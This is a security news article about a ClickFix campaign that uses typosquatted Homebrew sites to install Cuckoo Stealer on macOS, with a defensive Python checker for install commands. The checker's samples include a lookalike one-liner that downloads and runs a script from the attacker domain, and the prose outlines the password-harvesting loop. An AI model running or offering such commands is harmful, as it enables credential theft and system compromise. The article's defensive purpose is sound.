ClickFix Exploits Homebrew Workflow to Deploy Cuckoo Stealer on macOS
A sophisticated social engineering campaign has emerged, targeting macOS developers by exploiting the trusted Homebrew package management system. This attack employs the ClickFix technique to deceive users into executing malicious Terminal commands, leading to the deployment of Cuckoo Stealer, a credential-harvesting malware family.
Deceptive Tactics and Execution
The attackers have registered typosquatted domains that closely mimic the official Homebrew website. Developers visiting these fraudulent pages encounter what appears to be a standard installation command, complete with a convenient copy button. The malicious command subtly replaces the legitimate domain `raw.githubusercontent.com` with `raw.homabrews.org`, a change that can easily go unnoticed.
Upon execution, the script initiates a continuous password prompt loop using macOS Directory Services, ensuring that attackers obtain valid credentials before proceeding to the next stage. This method effectively exploits user trust and familiarity with standard installation procedures.
Infrastructure and Domain Analysis
Security analysts identified this campaign after discovering the typosquatted domain `homabrews.org`, registered on January 13, 2026. Further investigation revealed six interconnected domains hosted on shared infrastructure at IP address 5.255.123.244, with the earliest certificates dating back to July 2025. The domains employ various typosquatting techniques, including character omission, double-letter substitution, and alternative top-level domains, to enhance their deceptive effectiveness.
Technical Infection Workflow
The attack unfolds in two distinct stages:
1. Credential Harvesting: The initial script masquerades as a legitimate Homebrew installer while secretly validating user passwords through the `dscl authonly` command. It displays `Sorry, try again` for incorrect passwords, mimicking standard `sudo` behavior to avoid suspicion. Once valid credentials are captured, the script downloads a binary named `brew_agent`, encoding the stolen password in Base64 format and passing it as an argument for immediate access to protected system resources.
2. Malware Deployment: Cuckoo Stealer establishes persistence through the macOS LaunchAgent system, disguising itself as `com.homebrew.brewupdater.plist` to blend with legitimate system processes. The malware implements multiple anti-analysis techniques, including locale-based filtering that prevents execution on systems configured for Commonwealth of Independent States countries, specifically blocking Armenian, Belarusian, Kazakh, Russian, and Ukrainian locales. Additionally, all sensitive strings are encrypted using XOR-based obfuscation with index-based key rotation to evade static analysis and signature detection.
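As an added defender-side example (not code from the article, the campaign, or Homebrew), the check below audits a pasted install one-liner: it extracts every URL, accepts only Homebrew's genuine installer hosts, and flags any hostname whose DNS labels sit within a small edit distance of "homebrew", which catches the character-omission and letter-substitution squats described above, including `raw.homabrews.org`. The trusted-host allowlist and the edit-distance threshold are my assumptions.

```python
import re
from urllib.parse import urlparse

# Hosts the genuine Homebrew install one-liner fetches from. Assumption: this
# allowlist is mine, built around the raw.githubusercontent.com host named above.
TRUSTED_HOSTS = {"raw.githubusercontent.com", "github.com", "brew.sh"}
BRAND = "homebrew"
MAX_SQUAT_DISTANCE = 2  # assumption: squats sit within two edits of the brand

URL_RE = re.compile(r"https?://[^\s'\"()<>]+")


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance; covers omitted, substituted and doubled letters."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_host(host: str) -> str:
    """Return 'trusted', 'brand on unexpected domain', 'typosquat' or 'untrusted'."""
    host = host.lower()
    if host in TRUSTED_HOSTS:
        return "trusted"
    for label in host.split("."):
        if label == BRAND:
            return "brand on unexpected domain"  # e.g. the brand on an alternative TLD
        if edit_distance(label, BRAND) <= MAX_SQUAT_DISTANCE:
            return "typosquat"  # e.g. "homabrews", "homebrw"
    return "untrusted"


def audit_install_command(cmd: str) -> list[tuple[str, str]]:
    """List (host, verdict) for every URL in a pasted command that is not trusted."""
    findings = []
    for url in URL_RE.findall(cmd):
        host = urlparse(url).hostname or ""
        verdict = classify_host(host)
        if verdict != "trusted":
            findings.append((host, verdict))
    return findings


# Constructed samples: the genuine one-liner and the swapped-domain variant described above.
GENUINE = '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"'
LOOKALIKE = '/bin/bash -c "$(curl -fsSL https://raw.homabrews.org/Homebrew/install/HEAD/install.sh)"'
```

`audit_install_command(GENUINE)` returns an empty list, while the lookalike yields `[("raw.homabrews.org", "typosquat")]`; any non-empty result is a reason not to paste the command into a Terminal.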
Implications and Recommendations
This campaign underscores the evolving sophistication of social engineering attacks targeting developers. By exploiting trusted workflows and subtle domain alterations, attackers can effectively deceive users into compromising their systems.
To mitigate such threats, developers and users are advised to:
– Verify Domains Carefully: Always double-check URLs for subtle misspellings or unusual domain names before executing any commands.
– Avoid Blindly Copying Commands: Refrain from copying and executing commands from unverified sources, even if they appear legitimate.
– Implement Multi-Factor Authentication (MFA): Enhance security by requiring multiple forms of verification before granting access to sensitive systems.
– Stay Informed: Regularly update yourself on emerging threats and attack vectors targeting your specific development environment.
By adopting these practices, developers can better protect themselves against deceptive campaigns like ClickFix and maintain the integrity of their systems.